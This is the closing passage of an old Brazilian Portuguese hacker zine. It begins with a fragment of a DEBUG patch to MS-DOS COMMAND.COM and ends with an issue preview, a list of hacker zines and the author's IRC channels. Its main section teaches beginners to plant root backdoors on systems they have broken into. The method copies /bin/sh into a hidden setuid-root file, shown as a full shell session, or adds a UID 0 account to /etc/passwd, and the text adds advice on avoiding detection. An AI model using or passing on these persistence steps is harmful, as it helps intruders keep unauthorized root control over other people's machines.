-e cab3 2486:CAB3 50. { Aki digite 53(equivale a letra S)} -e cab4 2486:CAB4 59. { Aki digite 54 } -d cab1 2486:CAB1 54 45 53 54 05 50 41-55 53 45 04 44 41 54 45 TEST.PAUSE.DATE .... { note q COPY agora é ^^^^ } -w { para salvar } Gravando 17306 bytes Prontinho. Porém eu descobri que em umas versões do MSDOS contém uma proteção anti-crack que modificam algumas linhas da sua fonte. Mas isso não é nenhum grande problema para os Crackerz esperientes. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 9. Hack, the Art $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Este truque jah foi visto em muitos lugares. Mas vale apena mostra-lo de novo para os Begginers que ainda não o conhecem. O truque consiste em fazer uma backdoor usando o shell. Backdoor não passa de uma porta dos fundos para o invasor. Se você hackeia um sistema, e tah afim de voltar lah a qualquer hora denovo como root vc só precisa colocar uma boa backdoor q lhe dê nível de root e pronto. Essas são 2 bem simples jah conhecidas pelo pessoal entendido. Assim: 1. Você entra como root no sistema. 2. O sistema informa o seu UID e GID para a shell. Isso é o que acontece quando você entra em um sistema (não somente como root). Então vc faz o seguinte: 3. Edite o passwd. 4. Localize a conta do root que vc usou e veja qual é a sua shell(normalmente é sh ou bash). 5. Crie um diretório qquer no seu homedir(No seu, não no do root). Se vc não tiver, crie um no /usr, tipo /usr/struck. 6. Copie o shell do root para este diretório. 7. Deixe ele como oculto(com um . na frente). 8. Mude o modo dele para 777 e u+s. 9. Saia. Claro que antes Pegue o /etc/passwd se ainda não tiver feito. 10. Agora use a sua conta para acessar o sistema, se não tiver descripte o arquivo passwd e use qquer outra conta. 11. Vá ao dir que vc criou. 12. Execute o shell apartir desse diretório e PIMBA NA GORDUCHINHA! O que ?? Eu fui muito rapido e vc não conseguiu me acompanhar ?? Não seja por isso, apenas faça o que eu digo e faça o que eu faço :) Login : root Password : # ls etc bin dev usr pub # cd etc # cat passwd | grep root: root:x:0:0:SysAdmin:/:/bin/sh # cd /usr/eu # md /myfiles # cp /bin/sh /usr/eu/myfiles # cd myfiles # ls sh # mv sh .sh # chmod 777 .sh # chmod u+s .sh # logout Agora vc entra com a sua conta. Login : eu Password : $ pwd /usr/eu $ cd myfiles $ ls $ ls -la -rwsrwxrwx 1 root root 301580 May 19 20:30 .sh $ ./.sh # # id UID = 0(root) GID = 0 (root) # Ficou fácil?? Note que aki o login do root é "root" e o seu é "eu". Outra backdoor ainda mais fácil é essa: 1. Edite o /etc/passwd 2. Adicione uma conta com UID =0 e GID = 0 Essa é moleza, porém as chances de você não ser pego são minimas. Use em redes grandes(com bastantes users). $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 10. Preview $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Na próxima edição... * Phreaking 'Ultimos comandos para o TESTMODE; * Hacking para iniciantes 'Comandos exenciais p/ hackear; * Programação 'Talvéz um tutorial de C ou pascal(TALVÉZ); * VIRII 'Mais infos sobre Virus; * Invasão de privacidade 'Invadindo por ICQ; * Hack, the Art 'Mais backdoor's; * ¡Bonus! 'Portas do TCP/IP em constante uso 'ou 'URL's de FTP/TELNET. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ ¡BONUS! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ -=-=-=TOP10=-=-=- Os melhores materiais hacks brasileiros, encontrados na inet. 1. Zine Axur05 2. Zine Hack n' Phreak 3. Mask's HomePage v.II ( www.geocities.com/SiliconValley/Lab/2250 ) 4. Hack n' Phreak HomePage ( www.geocities.com/SiliconValley/Peaks/1292 ) 5. Zine Near(z) 6. Zine UHF 7. UHF Home page ( www.uhf.base.org ) 8. Zine RWX 9. Zine Quebra de Sigilo 10. Anti-Hacker's HomePage ( http://www.netgate.com.br/~hacker/index.htm ) $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ FFFFFFFFFFFF IIII NNNN NNN FFFFFFFFFFFF IIII NNNNNN NNN FFFF NNN NNN NNN FFFF IIII NNN NNN NNN FFFFFFFFFFFF IIII NNN NNN NNN FFFFFFFFFFFF IIII NNN NNN NNN FFFF IIII NNN NNN NNN FFFF IIII NNN NNNNNN FFFF IIII NNN NNNNN FFFF IIII NNN NNNN $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Este zine é escrito por Cheat Struck. No e-mail; No page; No ICQ; No IP fixed, IP spoofed; A unica maneira de me acharem na inet é: server irc.via-rs.com.br:6667 canais #via-rs #hackers #senhas #UKE #CSCHANNEL (canal fundado recentemente por mim, nem sempre no ar) Quando Sextas e Sabados(raramente) das 12:00 as 6:00